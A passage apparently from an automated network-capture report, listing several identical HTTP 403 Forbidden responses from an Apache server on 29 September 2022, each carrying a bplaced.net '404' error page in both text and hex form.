                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:24.434510946 CEST14329INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:24 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=121
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:25.440993071 CEST14337INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:25 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=115
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:26.131565094 CEST14345INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:26 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=115
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:27.227709055 CEST14353INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:27 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=107
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
                                                                                                                                                Data Ascii: <!DOCTYPE html><html dir="ltr"> <head> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="aut-hor" content="miro" /> <meta name="revisit-after" content="3 days" /> <meta name="robots" content="NOINDEX, FOLLOW" /> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <title>404</title> <link rel="apple-touch-icon" sizes="180x180" href="https://www.bplaced.net/apple-touch-icon.png" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-32x32.png" sizes="32x32" /> <link rel="icon" type="image/png" href="https://www.bplaced.net/favicon-16x16.png" sizes="16x16" /> <link rel="mask-icon"
                                                                                                                                                Sep 29, 2022 14:50:28.095082045 CEST14361INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:28 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                X-BP-NSA-REQID: (null) a.14UID=114
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                Last-Modified: Sun, 21 Jun 2020 03:37:25 GMT
                                                                                                                                                ETag: "1bbf-5a88fd839a740"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 7103
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 31 36 78 31 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20
